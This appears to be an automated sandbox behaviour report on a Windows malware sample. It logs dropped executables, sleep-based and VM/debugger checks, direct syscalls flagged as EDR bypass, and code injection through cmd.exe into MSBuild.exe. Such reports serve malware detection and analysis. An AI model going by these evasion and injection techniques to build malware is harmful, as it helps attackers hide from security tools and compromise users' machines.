Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -55131s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -49527s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -32019s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -54341s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -45828s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -55517s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -42184s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -51948s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -30066s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -41649s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -32091s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -56111s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -40617s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -38991s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -31463s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -48355s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -59245s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -55162s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -40699s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -38605s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -59303s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -45251s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -32359s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -37201s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -33049s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -33372s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -30615s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -52558s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -38527s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -46473s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -42320s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -53255s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -58861s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -56561s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -47964s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -58959s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -32692s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -58504s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe

File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00412570
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040D1C0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_004015C0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	1_2_00411650
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040B610
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	1_2_0040DB60
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	1_2_00411B80
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_0040D540
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	1_2_004121F0

Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe

Code function: 1_2_00401120 GetSystemInfo,ExitProcess,

1_2_00401120

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 30265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59883	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 37036	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59772	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 47193	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 39525	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 37399	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 50848	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 45672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55665	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 31071	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 46697	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55131	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 49527	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 32019	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 54341	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 45828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55517	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 42184	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 51948	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 30066	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 41649	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 32091	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56111	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 40617	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 38991	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 31463	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 48355	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59245	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55162	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 40699	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 38605	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59303	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 45251	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 32359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 37201	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 33049	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 33372	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 30615	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 52558	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 38527	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 46473	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 42320	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 53255	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58861	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56561	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 47964	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58959	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 32692	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58504	Jump to behavior

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	File opened: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	File opened: C:\Users\user\AppData\Local\Temp\u3bs.2	Jump to behavior

Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmp	Binary or memory string: Microsoft Hyper-V Server
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmp	Binary or memory string: 6without Hyper-V for Windows Essential Server Solutions
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmp	Binary or memory string: Datacenter without Hyper-V Core
Source: cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noreply@vmware.com0
Source: cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmp	Binary or memory string: QEMU_HARDU
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmp	Binary or memory string: Standard without Hyper-V Full
Source: cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1!0
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmp	Binary or memory string: Enterprise without Hyper-V Core
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.2975335845.000000000432A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: u3bs.0.exe, 00000001.00000002.2975335845.000000000432A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0/
Source: cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1
Source: cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.0
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmp	Binary or memory string: Standard without Hyper-V Core
Source: u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmp	Binary or memory string: VMWARE_VIRTUAL
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmp	Binary or memory string: Datacenter without Hyper-V Full
Source: TNQTc6Qmkg.exe, 00000000.00000002.2973180744.0000000005EF6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmp	Binary or memory string: Enterprise without Hyper-V Full
Source: u3bs.0.exe, 00000001.00000002.2975335845.000000000432A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareh
Source: MSBuild.exe, 0000000C.00000002.2976248238.0000000000B5E000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000002.2969616251.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	API call chain: ExitProcess graph end node	graph_1-80879
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	API call chain: ExitProcess graph end node	graph_1-80894
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	API call chain: ExitProcess graph end node	graph_1-80876
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	API call chain: ExitProcess graph end node	graph_1-81912
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	API call chain: ExitProcess graph end node	graph_1-80920
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	API call chain: ExitProcess graph end node	graph_1-80890
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	API call chain: ExitProcess graph end node	graph_1-80897
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	API call chain: ExitProcess graph end node	graph_1-80719
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe

Code function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00409A73

Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe

Code function: 5_2_001ED15B VirtualProtect ?,-00000001,00000104,?,?,?,00000000

5_2_001ED15B

Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe

1_2_00416240

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_004139E7 mov eax, dword ptr fs:[00000030h]	0_2_004139E7
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_042654B3 push dword ptr fs:[00000030h]	0_2_042654B3
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_05CF0D90 mov eax, dword ptr fs:[00000030h]	0_2_05CF0D90
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_05D03C4E mov eax, dword ptr fs:[00000030h]	0_2_05D03C4E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_05CF092B mov eax, dword ptr fs:[00000030h]	0_2_05CF092B
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_00415DC0 mov eax, dword ptr fs:[00000030h]	1_2_00415DC0

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe

Code function: 0_2_00420AEA GetProcessHeap,

0_2_00420AEA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00409A73
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_00409C06 SetUnhandledExceptionFilter,	0_2_00409C06
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_00409EBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00409EBE
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_0041073B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0041073B
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_05CF9CDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_05CF9CDA
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_05CF9E6D SetUnhandledExceptionFilter,	0_2_05CF9E6D
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_05D009A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_05D009A2
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_05CFA125 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_05CFA125
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_00419DC7 SetUnhandledExceptionFilter,	1_2_00419DC7
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00417B4E
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_004173DD
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0AB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_6B0AB1F7
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0AB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_6B0AB66C
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C79AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_6C79AC62
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: 5_2_001EC1FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_001EC1FD
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: 5_2_001F6678 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_001F6678

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	NtSetInformationThread: Direct from: 0x6AE1617C
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	NtQuerySystemInformation: Direct from: 0xE5BE4
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	NtSetInformationThread: Direct from: 0x6C75617C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write

Searches for specific processes (likely to inject)

Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe

Code function: 1_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

1_2_00415D00

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6B111000	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 516008	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6B111000
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 111F008

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Process created: C:\Users\user\AppData\Local\Temp\u3bs.0.exe "C:\Users\user\AppData\Local\Temp\u3bs.0.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Process created: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe "C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Process created: C:\Users\user\AppData\Local\Temp\u3bs.3.exe "C:\Users\user\AppData\Local\Temp\u3bs.3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe"	Jump to behavior
